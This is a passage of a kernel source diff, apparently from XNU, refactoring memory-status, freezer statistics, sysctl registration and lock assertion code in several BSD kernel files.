memorystatus_testing_pid = 0; } #endif /* DEVELOPMENT || DEBUG */ @@ -3434,6 +3436,10 @@ memorystatus_on_resume(proc_t p) p->p_memstat_state |= P_MEMSTAT_REFREEZE_ELIGIBLE; memorystatus_refreeze_eligible_count++; } + if (p->p_memstat_thaw_count == 0 || p->p_memstat_last_thaw_interval < memorystatus_freeze_current_interval) { + os_atomic_inc(&(memorystatus_freezer_stats.mfs_processes_thawed), relaxed); + } + p->p_memstat_last_thaw_interval = memorystatus_freeze_current_interval; p->p_memstat_thaw_count++; memorystatus_thaw_count++; @@ -4812,7 +4818,7 @@ memorystatus_get_task_phys_footprint_page_counts(task_t task, static bool memorystatus_jetsam_snapshot_copy_entry_locked(memorystatus_jetsam_snapshot_t *dst_snapshot, unsigned int dst_snapshot_size, const memorystatus_jetsam_snapshot_entry_t *src_entry) { - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); assert(dst_snapshot); if (dst_snapshot->entry_count == dst_snapshot_size) { @@ -4831,7 +4837,7 @@ memorystatus_jetsam_snapshot_copy_entry_locked(memorystatus_jetsam_snapshot_t *d static bool 
memorystatus_init_jetsam_snapshot_entry_with_kill_locked(memorystatus_jetsam_snapshot_t *snapshot, proc_t p, uint32_t kill_cause, uint64_t killtime, memorystatus_jetsam_snapshot_entry_t **entry) { - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); memorystatus_jetsam_snapshot_entry_t *snapshot_list = snapshot->entries; size_t i = snapshot->entry_count; @@ -4863,7 +4869,7 @@ memorystatus_update_jetsam_snapshot_entry_locked(proc_t p, uint32_t kill_cause, bool copied_to_freezer_snapshot = false; #endif /* CONFIG_FREEZE */ - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); if (memorystatus_jetsam_snapshot_count == 0) { /* @@ -5264,7 +5270,7 @@ memorystatus_init_jetsam_snapshot_locked(memorystatus_jetsam_snapshot_t *od_snap memorystatus_jetsam_snapshot_entry_t *snapshot_list = NULL; unsigned int snapshot_max = 0; - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); if (od_snapshot) { /* @@ -5352,7 +5358,7 @@ memorystatus_cmd_set_panic_bits(user_addr_t buffer, size_t buffer_size) static int memorystatus_verify_sort_order(unsigned int bucket_index, pid_t *expected_order, size_t num_pids) { - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); int error = 0; proc_t p = NULL; @@ -6995,7 +7001,7 @@ memorystatus_cmd_get_jetsam_snapshot(int32_t flags, user_addr_t buffer, size_t b */ proc_list_lock(); #if DEVELOPMENT || DEBUG - if (memorystatus_snapshot_owner != 0 && memorystatus_snapshot_owner != current_proc()->p_pid) { + if (memorystatus_testing_pid != 0 && memorystatus_testing_pid != current_proc()->p_pid) { /* Snapshot is currently owned by someone else. Don't consume it. 
*/ proc_list_unlock(); goto out; @@ -7037,27 +7043,27 @@ out: #if DEVELOPMENT || DEBUG static int -memorystatus_cmd_set_jetsam_snapshot_ownership(int32_t flags) +memorystatus_cmd_set_testing_pid(int32_t flags) { int error = EINVAL; proc_t caller = current_proc(); assert(caller != kernproc); proc_list_lock(); - if (flags & MEMORYSTATUS_FLAGS_SNAPSHOT_TAKE_OWNERSHIP) { - if (memorystatus_snapshot_owner == 0) { - memorystatus_snapshot_owner = caller->p_pid; + if (flags & MEMORYSTATUS_FLAGS_SET_TESTING_PID) { + if (memorystatus_testing_pid == 0) { + memorystatus_testing_pid = caller->p_pid; error = 0; - } else if (memorystatus_snapshot_owner == caller->p_pid) { + } else if (memorystatus_testing_pid == caller->p_pid) { error = 0; } else { /* We don't allow ownership to be taken from another proc. */ error = EBUSY; } - } else if (flags & MEMORYSTATUS_FLAGS_SNAPSHOT_DROP_OWNERSHIP) { - if (memorystatus_snapshot_owner == caller->p_pid) { - memorystatus_snapshot_owner = 0; + } else if (flags & MEMORYSTATUS_FLAGS_UNSET_TESTING_PID) { + if (memorystatus_testing_pid == caller->p_pid) { + memorystatus_testing_pid = 0; error = 0; - } else if (memorystatus_snapshot_owner != 0) { + } else if (memorystatus_testing_pid != 0) { /* We don't allow ownership to be taken from another proc. */ error = EPERM; } @@ -7281,6 +7287,13 @@ memorystatus_cmd_grp_set_probabilities(user_addr_t buffer, size_t buffer_size) size_t entry_count = 0, i = 0; memorystatus_internal_probabilities_t *tmp_table_new = NULL, *tmp_table_old = NULL; size_t tmp_table_new_size = 0, tmp_table_old_size = 0; +#if DEVELOPMENT || DEBUG + if (memorystatus_testing_pid != 0 && memorystatus_testing_pid != current_proc()->p_pid) { + /* probabilities are currently owned by someone else. Don't change them. 
*/ + error = EPERM; + goto out; + } +#endif /* (DEVELOPMENT || DEBUG)*/ /* Verify inputs */ if ((buffer == USER_ADDR_NULL) || (buffer_size == 0)) { @@ -7679,7 +7692,7 @@ memorystatus_set_memlimit_properties_internal(proc_t p, memorystatus_memlimit_pr { int error = 0; - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); /* * Store the active limit variants in the proc. @@ -7938,8 +7951,8 @@ memorystatus_control(struct proc *p __unused, struct memorystatus_control_args * error = memorystatus_cmd_get_jetsam_snapshot((int32_t)args->flags, args->buffer, args->buffersize, ret); break; #if DEVELOPMENT || DEBUG - case MEMORYSTATUS_CMD_SET_JETSAM_SNAPSHOT_OWNERSHIP: - error = memorystatus_cmd_set_jetsam_snapshot_ownership((int32_t) args->flags); + case MEMORYSTATUS_CMD_SET_TESTING_PID: + error = memorystatus_cmd_set_testing_pid((int32_t) args->flags); break; #endif case MEMORYSTATUS_CMD_GET_PRESSURE_STATUS: diff --git a/bsd/kern/kern_memorystatus_freeze.c b/bsd/kern/kern_memorystatus_freeze.c index 1dfa926e9..930b2c3c1 100644 --- a/bsd/kern/kern_memorystatus_freeze.c +++ b/bsd/kern/kern_memorystatus_freeze.c @@ -96,9 +96,8 @@ unsigned long freeze_threshold_percentage = 50; #if CONFIG_FREEZE -lck_grp_attr_t *freezer_lck_grp_attr; -lck_grp_t *freezer_lck_grp; -static lck_mtx_t freezer_mutex; +static LCK_GRP_DECLARE(freezer_lck_grp, "freezer"); +static LCK_MTX_DECLARE(freezer_mutex, &freezer_lck_grp); /* Thresholds */ unsigned int memorystatus_freeze_threshold = 0; @@ -129,60 +128,7 @@ unsigned int memorystatus_thaw_count = 0; /* # of thaws in the current freezer i uint64_t memorystatus_thaw_count_since_boot = 0; /* The number of thaws since boot */ unsigned int memorystatus_refreeze_eligible_count = 0; /* # of processes currently thawed i.e. 
have state on disk & in-memory */ -/* Freezer counters collected for telemtry */ -static struct memorystatus_freezer_stats_t { - /* - * # of processes that we've considered freezing. - * Used to normalize the error reasons below. - */ - uint64_t mfs_process_considered_count; - - /* - * The following counters track how many times we've failed to freeze - * a process because of a specific FREEZER_ERROR. - */ - /* EXCESS_SHARED_MEMORY */ - uint64_t mfs_error_excess_shared_memory_count; - /* LOW_PRIVATE_SHARED_RATIO */ - uint64_t mfs_error_low_private_shared_ratio_count; - /* NO_COMPRESSOR_SPACE */ - uint64_t mfs_error_no_compressor_space_count; - /* NO_SWAP_SPACE */ - uint64_t mfs_error_no_swap_space_count; - /* pages < memorystatus_freeze_pages_min */ - uint64_t mfs_error_below_min_pages_count; - /* dasd determined it was unlikely to be relaunched. */ - uint64_t mfs_error_low_probability_of_use_count; - /* transient reasons (like inability to acquire a lock). */ - uint64_t mfs_error_other_count; - - /* - * # of times that we saw memorystatus_available_pages <= memorystatus_freeze_threshold. - * Used to normalize skipped_full_count and shared_mb_high_count. - */ - uint64_t mfs_below_threshold_count; - - /* Skipped running the freezer because we were out of slots */ - uint64_t mfs_skipped_full_count; - - /* Skipped running the freezer because we were over the shared mb limit*/ - uint64_t mfs_skipped_shared_mb_high_count; - - /* - * How many pages have not been sent to swap because they were in a shared object? - * This is being used to gather telemtry so we can understand the impact we'd have - * on our NAND budget if we did swap out these pages. - */ - uint64_t mfs_shared_pages_skipped; - - /* - * A running sum of the total number of bytes sent to NAND during - * refreeze operations since boot. 
- */ - uint64_t mfs_bytes_refrozen; - /* The number of refreeze operations since boot */ - uint64_t mfs_refreeze_count; -} memorystatus_freezer_stats = {0}; +struct memorystatus_freezer_stats_t memorystatus_freezer_stats = {0}; #endif /* XNU_KERNEL_PRIVATE */ @@ -208,6 +154,7 @@ static throttle_interval_t throttle_intervals[] = { }; throttle_interval_t *degraded_throttle_window = &throttle_intervals[0]; throttle_interval_t *normal_throttle_window = &throttle_intervals[1]; +uint32_t memorystatus_freeze_current_interval = 0; extern uint64_t vm_swap_get_free_space(void); extern boolean_t vm_swap_max_budget(uint64_t *); @@ -226,6 +173,7 @@ SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_count, CTLFLAG_RD | CTLFLAG_LOC SYSCTL_UINT(_kern, OID_AUTO, memorystatus_thaw_count, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_thaw_count, 0, ""); SYSCTL_QUAD(_kern, OID_AUTO, memorystatus_thaw_count_since_boot, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_thaw_count_since_boot, ""); SYSCTL_QUAD(_kern, OID_AUTO, memorystatus_freeze_pageouts, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_freeze_pageouts, ""); +SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_interval, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_freeze_current_interval, 0, ""); #if DEVELOPMENT || DEBUG static int sysctl_memorystatus_freeze_budget_pages_remaining SYSCTL_HANDLER_ARGS { @@ -285,27 +233,21 @@ static_assert(_kMemorystatusFreezeSkipReasonMax <= UINT8_MAX); static int sysctl_memorystatus_freezer_thaw_percentage SYSCTL_HANDLER_ARGS { #pragma unused(arg1, arg2) - size_t thaw_count = 0, frozen_count = 0; + uint64_t thaw_count = 0, frozen_count = 0; int thaw_percentage = 100; - unsigned int band = (unsigned int) memorystatus_freeze_jetsam_band; - proc_t p = PROC_NULL; - proc_list_lock(); - - p = memorystatus_get_first_proc_locked(&band, FALSE); + frozen_count = os_atomic_load(&(memorystatus_freezer_stats.mfs_processes_frozen), relaxed); + thaw_count = os_atomic_load(&(memorystatus_freezer_stats.mfs_processes_thawed), 
relaxed); - while (p) { - if (p->p_memstat_state & P_MEMSTAT_FROZEN) { - if (p->p_memstat_thaw_count > 0) { - thaw_count++; - } - frozen_count++; - } - p = memorystatus_get_next_proc_locked(&band, p, FALSE); - } - proc_list_unlock(); if (frozen_count > 0) { - assert(thaw_count <= frozen_count); - thaw_percentage = (int)(100 * thaw_count / frozen_count); + if (thaw_count > frozen_count) { + /* + * Both counts are using relaxed atomics & could be out of sync + * causing us to see thaw_percentage > 100. + */ + thaw_percentage = 100; + } else { + thaw_percentage = (int)(100 * thaw_count / frozen_count); + } } return sysctl_handle_int(oidp, &thaw_percentage, 0, req); } @@ -313,16 +255,28 @@ SYSCTL_PROC(_kern, OID_AUTO, memorystatus_freezer_thaw_percentage, CTLTYPE_INT | #define FREEZER_ERROR_STRING_LENGTH 128 +EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_pages_min, &memorystatus_freeze_pages_min, 0, UINT32_MAX, ""); +EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_pages_max, &memorystatus_freeze_pages_max, 0, UINT32_MAX, ""); +EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_processes_max, &memorystatus_frozen_processes_max, 0, UINT32_MAX, ""); +EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_jetsam_band, &memorystatus_freeze_jetsam_band, JETSAM_PRIORITY_IDLE, JETSAM_PRIORITY_MAX - 1, ""); +EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_private_shared_pages_ratio, &memorystatus_freeze_private_shared_pages_ratio, 0, UINT32_MAX, ""); +EXPERIMENT_FACTOR_UINT(_kern, memorystatus_freeze_min_processes, &memorystatus_freeze_suspended_threshold, 0, UINT32_MAX, ""); +/* + * max. # of frozen process demotions we will allow in our daily cycle. + */ +EXPERIMENT_FACTOR_UINT(_kern, memorystatus_max_freeze_demotions_daily, &memorystatus_max_frozen_demotions_daily, 0, UINT32_MAX, ""); + +/* + * min # of thaws needed by a process to protect it from getting demoted into the IDLE band. 
+ */ +EXPERIMENT_FACTOR_UINT(_kern, memorystatus_thaw_count_demotion_threshold, &memorystatus_thaw_count_demotion_threshold, 0, UINT32_MAX, ""); + #if DEVELOPMENT || DEBUG -SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_jetsam_band, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_jetsam_band, 0, ""); SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_daily_mb_max, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_daily_mb_max, 0, ""); SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_degraded_mode, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_freeze_degradation, 0, ""); SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_threshold, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_threshold, 0, ""); -SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_pages_min, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_pages_min, 0, ""); -SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_pages_max, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_pages_max, 0, ""); SYSCTL_UINT(_kern, OID_AUTO, memorystatus_refreeze_eligible_count, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_refreeze_eligible_count, 0, ""); -SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_processes_max, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_frozen_processes_max, 0, ""); /* * Max. shared-anonymous memory in MB that can be held by frozen processes in the high jetsam band. 
@@ -334,18 +288,6 @@ SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_shared_mb_max, CTLFLAG_RW | CTL SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_shared_mb, CTLFLAG_RD | CTLFLAG_LOCKED, &memorystatus_frozen_shared_mb, 0, ""); SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_shared_mb_per_process_max, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_shared_mb_per_process_max, 0, ""); -SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_private_shared_pages_ratio, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_private_shared_pages_ratio, 0, ""); - -SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_min_processes, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_suspended_threshold, 0, ""); - -/* - * max. # of frozen process demotions we will allow in our daily cycle. - */ -SYSCTL_UINT(_kern, OID_AUTO, memorystatus_max_freeze_demotions_daily, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_max_frozen_demotions_daily, 0, ""); -/* - * min # of thaws needed by a process to protect it from getting demoted into the IDLE band. 
- */ -SYSCTL_UINT(_kern, OID_AUTO, memorystatus_thaw_count_demotion_threshold, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_thaw_count_demotion_threshold, 0, ""); boolean_t memorystatus_freeze_throttle_enabled = TRUE; SYSCTL_UINT(_kern, OID_AUTO, memorystatus_freeze_throttle_enabled, CTLFLAG_RW | CTLFLAG_LOCKED, &memorystatus_freeze_throttle_enabled, 0, ""); @@ -462,6 +404,7 @@ again: p->p_memstat_state |= P_MEMSTAT_FROZEN; p->p_memstat_freeze_skip_reason = kMemorystatusFreezeSkipReasonNone; memorystatus_frozen_count++; + os_atomic_inc(&memorystatus_freezer_stats.mfs_processes_frozen, relaxed); if (memorystatus_frozen_count == memorystatus_frozen_processes_max) { memorystatus_freeze_out_of_slots(); } @@ -811,7 +754,7 @@ continue_eval: for (j = 0; j < entry_count; j++) { if (strncmp(memorystatus_global_probabilities_table[j].proc_name, p->p_name, - MAXCOMLEN + 1) == 0) { + MAXCOMLEN) == 0) { probability_of_use = memorystatus_global_probabilities_table[j].use_probability; break; } @@ -1176,11 +1119,6 @@ memorystatus_freeze_init(void) kern_return_t result; thread_t thread; - freezer_lck_grp_attr = lck_grp_attr_alloc_init(); - freezer_lck_grp = lck_grp_alloc_init("freezer", freezer_lck_grp_attr); - - lck_mtx_init(&freezer_mutex, freezer_lck_grp, NULL); - /* * This is just the default value if the underlying * storage device doesn't have any specific budget. @@ -1208,7 +1146,7 @@ memorystatus_is_process_eligible_for_freeze(proc_t p) * Called with proc_list_lock held. */ - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); boolean_t should_freeze = FALSE; uint32_t state = 0, pages = 0; @@ -1332,9 +1270,15 @@ memorystatus_is_process_eligible_for_freeze(proc_t p) if (entry_count) { for (i = 0; i < entry_count; i++) { + /* + * NB: memorystatus_internal_probabilities.proc_name is MAXCOMLEN + 1 bytes + * proc_t.p_name is 2*MAXCOMLEN + 1 bytes. 
So we only compare the first + * MAXCOMLEN bytes here since the name in the probabilities table could + * be truncated from the proc_t's p_name. + */ if (strncmp(memorystatus_global_probabilities_table[i].proc_name, p->p_name, - MAXCOMLEN + 1) == 0) { + MAXCOMLEN) == 0) { probability_of_use = memorystatus_global_probabilities_table[i].use_probability; break; } @@ -1475,6 +1419,7 @@ memorystatus_freeze_process_sync(proc_t p) p->p_memstat_state |= P_MEMSTAT_FROZEN; p->p_memstat_freeze_skip_reason = kMemorystatusFreezeSkipReasonNone; memorystatus_frozen_count++; + os_atomic_inc(&memorystatus_freezer_stats.mfs_processes_frozen, relaxed); if (memorystatus_frozen_count == memorystatus_frozen_processes_max) { memorystatus_freeze_out_of_slots(); } @@ -1719,6 +1664,7 @@ freeze_process: p->p_memstat_state |= P_MEMSTAT_FROZEN; p->p_memstat_freeze_skip_reason = kMemorystatusFreezeSkipReasonNone; memorystatus_frozen_count++; + os_atomic_inc(&memorystatus_freezer_stats.mfs_processes_frozen, relaxed); if (memorystatus_frozen_count == memorystatus_frozen_processes_max) { memorystatus_freeze_out_of_slots(); } @@ -1863,7 +1809,7 @@ freeze_process: } else { p->p_memstat_state |= P_MEMSTAT_FREEZE_IGNORE; } - memorystatus_freeze_handle_error(p, p->p_memstat_state & P_MEMSTAT_FROZEN, freezer_error_code, aPid, coal, "memorystatus_freeze_top_process"); + memorystatus_freeze_handle_error(p, freezer_error_code, p->p_memstat_state & P_MEMSTAT_FROZEN, aPid, coal, "memorystatus_freeze_top_process"); proc_rele_locked(p); @@ -1899,6 +1845,33 @@ freeze_process: return ret; } +#if DEVELOPMENT || DEBUG +/* For testing memorystatus_freeze_top_process */ +static int +sysctl_memorystatus_freeze_top_process SYSCTL_HANDLER_ARGS +{ +#pragma unused(arg1, arg2) + int error, val = 0; /* zero-init: sysctl_handle_int() reports val back to the caller on a read, so it must not be stack garbage */ + /* + * Only freeze on write to prevent freezing during `sysctl -a`. + * The actual value written doesn't matter.
+ */ + error = sysctl_handle_int(oidp, &val, 0, req); + if (error || !req->newptr) { + return error; + } + lck_mtx_lock(&freezer_mutex); + int ret = memorystatus_freeze_top_process(); + lck_mtx_unlock(&freezer_mutex); + if (ret == -1) { + ret = ESRCH; + } + return ret; +} +SYSCTL_PROC(_vm, OID_AUTO, memorystatus_freeze_top_process, CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_MASKED, + 0, 0, &sysctl_memorystatus_freeze_top_process, "I", ""); +#endif /* DEVELOPMENT || DEBUG */ + static inline boolean_t memorystatus_can_freeze_processes(void) { @@ -2146,7 +2119,7 @@ static void memorystatus_freeze_mark_eligible_processes_with_skip_reason(memorystatus_freeze_skip_reason_t reason, bool locked) { LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED); - LCK_MTX_ASSERT(proc_list_mlock, locked ? LCK_MTX_ASSERT_OWNED : LCK_MTX_ASSERT_NOTOWNED); + LCK_MTX_ASSERT(&proc_list_mlock, locked ? LCK_MTX_ASSERT_OWNED : LCK_MTX_ASSERT_NOTOWNED); unsigned int band = JETSAM_PRIORITY_IDLE; proc_t p; @@ -2225,7 +2198,7 @@ static void memorystatus_freeze_start_normal_throttle_interval(uint32_t new_budget, mach_timespec_t start_ts) { LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED); - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); normal_throttle_window->max_pageouts = new_budget; normal_throttle_window->ts.tv_sec = normal_throttle_window->mins * 60; @@ -2239,6 +2212,13 @@ memorystatus_freeze_start_normal_throttle_interval(uint32_t new_budget, mach_tim } /* Ensure the normal window is now active. */ memorystatus_freeze_degradation = FALSE; + memorystatus_freezer_stats.mfs_shared_pages_skipped = 0; + /* + * Reset the thawed percentage to 0 so we re-evaluate in the new interval. 
+ */ + os_atomic_store(&memorystatus_freezer_stats.mfs_processes_thawed, 0, release); + os_atomic_store(&memorystatus_freezer_stats.mfs_processes_frozen, memorystatus_frozen_count, release); + os_atomic_inc(&memorystatus_freeze_current_interval, release); } #if DEVELOPMENT || DEBUG @@ -2273,7 +2253,7 @@ static void memorystatus_freeze_out_of_budget(const struct throttle_interval_t *interval) { LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED); - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); mach_timespec_t time_left = {0, 0}; mach_timespec_t now_ts; @@ -2302,7 +2282,7 @@ static void memorystatus_freeze_out_of_slots(void) { LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED); - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_OWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_OWNED); assert(memorystatus_frozen_count == memorystatus_frozen_processes_max); os_log(OS_LOG_DEFAULT, @@ -2338,7 +2318,7 @@ memorystatus_freeze_update_throttle(uint64_t *budget_pages_allowed) clock_nsec_t nsec; mach_timespec_t now_ts; LCK_MTX_ASSERT(&freezer_mutex, LCK_MTX_ASSERT_OWNED); - LCK_MTX_ASSERT(proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); + LCK_MTX_ASSERT(&proc_list_mlock, LCK_MTX_ASSERT_NOTOWNED); unsigned int freeze_daily_pageouts_max = 0; uint32_t budget_rollover = 0; @@ -2386,7 +2366,6 @@ memorystatus_freeze_update_throttle(uint64_t *budget_pages_allowed) interval->mins, budget_rollover), now_ts); *budget_pages_allowed = interval->max_pageouts; - memorystatus_freezer_stats.mfs_shared_pages_skipped = 0; memorystatus_demote_frozen_processes(FALSE); /* normal mode...don't force a demotion */ } else { diff --git a/bsd/kern/kern_mib.c b/bsd/kern/kern_mib.c index 85ffba28d..691e11732 100644 --- a/bsd/kern/kern_mib.c +++ b/bsd/kern/kern_mib.c @@ -140,7 +140,7 @@ static int cputhreadtype, cpu64bit; static uint64_t cacheconfig[10], cachesize[10]; static int packages; -static char * osenvironment; +static char 
* osenvironment = NULL; static uint32_t osenvironment_size = 0; static int osenvironment_initialized = 0; @@ -152,21 +152,21 @@ static struct { uint32_t use_recovery_securityd:1; } property_existence = {0, 0}; -SYSCTL_NODE(, 0, sysctl, CTLFLAG_RW | CTLFLAG_LOCKED, 0, +SYSCTL_EXTENSIBLE_NODE(, 0, sysctl, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "Sysctl internal magic"); -SYSCTL_NODE(, CTL_KERN, kern, CTLFLAG_RW | CTLFLAG_LOCKED, 0, +SYSCTL_EXTENSIBLE_NODE(, CTL_KERN, kern, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "High kernel, proc, limits &c"); -SYSCTL_NODE(, CTL_VM, vm, CTLFLAG_RW | CTLFLAG_LOCKED, 0, +SYSCTL_EXTENSIBLE_NODE(, CTL_VM, vm, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "Virtual memory"); -SYSCTL_NODE(, CTL_VFS, vfs, CTLFLAG_RW | CTLFLAG_LOCKED, 0, +SYSCTL_EXTENSIBLE_NODE(, CTL_VFS, vfs, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "File system"); -SYSCTL_NODE(, CTL_NET, net, CTLFLAG_RW | CTLFLAG_LOCKED, 0, +SYSCTL_EXTENSIBLE_NODE(, CTL_NET, net, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "Network, (see socket.h)"); -SYSCTL_NODE(, CTL_DEBUG, debug, CTLFLAG_RW | CTLFLAG_LOCKED, 0, +SYSCTL_EXTENSIBLE_NODE(, CTL_DEBUG, debug, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "Debugging"); SYSCTL_NODE(, CTL_HW, hw, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "hardware"); -SYSCTL_NODE(, CTL_MACHDEP, machdep, CTLFLAG_RW | CTLFLAG_LOCKED, 0, +SYSCTL_EXTENSIBLE_NODE(, CTL_MACHDEP, machdep, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "machine dependent"); SYSCTL_NODE(, CTL_USER, user, CTLFLAG_RW | CTLFLAG_LOCKED, 0, "user-level"); @@ -475,11 +475,14 @@ sysctl_tbfrequency return sysctl_io_number(req, l, sizeof(l), NULL, NULL); } +/* + * Called by IOKit on Intel, or by sysctl_load_devicetree_entries() + */ void sysctl_set_osenvironment(unsigned int size, const void* value) { if (osenvironment_size == 0 && size > 0) { - MALLOC(osenvironment, char *, size, M_TEMP, M_WAITOK); + osenvironment = zalloc_permanent(size, ZALIGN_NONE); if (osenvironment) { memcpy(osenvironment, value, size); osenvironment_size = size; @@ -501,7 +504,8 @@ 
sysctl_unblock_osenvironment(void) * PE_init_iokit(). Doing this also avoids the extern-C hackery to access these entries * from IORegistry (which requires C++). */ -void +__startup_func +static void sysctl_load_devicetree_entries(void) { DTEntry chosen; @@ -514,11 +518,7 @@ sysctl_load_devicetree_entries(void) /* load osenvironment */ if (kSuccess == SecureDTGetProperty(chosen, "osenvironment", (void const **) &value, &size)) { - MALLOC(osenvironment, char *, size, M_TEMP, M_WAITOK); - if (osenvironment) { - memcpy(osenvironment, value, size); - osenvironment_size = size; - } + sysctl_set_osenvironment(size, value); } /* load ephemeral_storage */ @@ -537,6 +537,7 @@ sysctl_load_devicetree_entries(void) } } } +STARTUP(SYSCTL, STARTUP_RANK_MIDDLE, sysctl_load_devicetree_entries); static int sysctl_osenvironment @@ -745,7 +746,7 @@ SYSCTL_INT(_hw_optional, OID_AUTO, floatingpoint, CTLFLAG_RD | CTLFLAG_KERN | CT /* * Optional device hardware features can be registered by drivers below hw.features */ -SYSCTL_NODE(_hw, OID_AUTO, features, CTLFLAG_RD | CTLFLAG_LOCKED, NULL, "hardware features"); +SYSCTL_EXTENSIBLE_NODE(_hw, OID_AUTO, features, CTLFLAG_RD | CTLFLAG_LOCKED, NULL, "hardware features"); /* * Deprecated variables. These are supported for backwards compatibility @@ -912,7 +913,6 @@ SYSCTL_INT(_hw_optional, OID_AUTO, arm64, CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LO void sysctl_mib_init(void) { - cputhreadtype = cpu_threadtype(); #if defined(__i386__) || defined (__x86_64__) cpu64bit = (_get_cpu_capabilities() & k64Bit) == k64Bit; #elif defined(__arm__) || defined (__arm64__) @@ -921,18 +921,6 @@ sysctl_mib_init(void) #error Unsupported arch #endif - /* - * Populate the optional portion of the hw.* MIB. - * - * XXX This could be broken out into parts of the code - * that actually directly relate to the functions in - * question. 
- */ - - if (cputhreadtype != CPU_THREADTYPE_NONE) { - sysctl_register_oid(&sysctl__hw_cputhreadtype); - } - #if defined (__i386__) || defined (__x86_64__) /* hw.cacheconfig */ cacheconfig[0] = ml_cpu_cache_sharing(0); @@ -976,8 +964,28 @@ sysctl_mib_init(void) cachesize[4] = 0; packages = 1; - #else #error unknown architecture #endif /* !__i386__ && !__x86_64 && !__arm__ && !__arm64__ */ } + +__startup_func +static void +sysctl_mib_startup(void) +{ + cputhreadtype = cpu_threadtype(); + + /* + * Populate the optional portion of the hw.* MIB. + * + * XXX This could be broken out into parts of the code + * that actually directly relate to the functions in + * question. + */ + + if (cputhreadtype != CPU_THREADTYPE_NONE) { + sysctl_register_oid_early(&sysctl__hw_cputhreadtype); + } + +} +STARTUP(SYSCTL, STARTUP_RANK_MIDDLE, sysctl_mib_startup); diff --git a/bsd/kern/kern_mman.c b/bsd/kern/kern_mman.c index 9e9e8f8f2..0cc17e529 100644 --- a/bsd/kern/kern_mman.c +++ b/bsd/kern/kern_mman.c @@ -273,7 +273,7 @@ mmap(proc_t p, struct mmap_args *uap, user_addr_t *retval) /* make sure mapping fits into numeric range etc */ - if (os_add3_overflow(file_pos, user_size, 